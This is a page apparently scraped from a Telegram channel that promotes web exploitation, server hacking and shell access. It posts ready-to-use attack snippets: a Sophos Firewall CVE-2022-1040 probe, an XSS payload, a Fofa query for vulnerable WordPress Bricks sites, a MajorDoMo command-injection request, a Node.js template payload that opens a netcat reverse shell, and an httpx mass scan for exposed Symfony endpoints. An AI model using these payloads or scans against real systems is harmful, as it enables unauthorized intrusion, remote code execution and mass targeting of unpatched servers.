0Day.Today | Learn Exploit | Zero World | Dark web |
14.2K subscribers
1.11K photos
76 videos
462 files
1.09K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
CVE-2022-1040 - RCE in Sophos Firewall

curl -sk -H "X-Requested-With: XMLHttpRequest" -X POST 'hxxps://x.x.x.x/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"x":"test"\}' | grep -q 'Session Expired'


#CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
reflected XSS to RCE

Payload: "><img src=x onerror=alert(whoami)>

#Xss #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8

Query Fofa: body="/wp-content/themes/bricks/"

POC

Nuclei

#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)

Github

#RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
MajorDoMo thumb RCE

GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1``

#rce #Poc #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
If you discover a node.js template area, you should try triggerable node payload 🔥; require('child_process').exec('nc -e sh ip port');{src:/bin/sh/}

so you can get
RCE 💎

#rce #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Exploits Symfony

httpx -l hosts.txt -path /_fragment?_path=_controller=phpcredits&flag=-1 -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits"

Github

#Exploit #RCE
——————‌
0Day.Today
@LearnExploit
@Tech_Army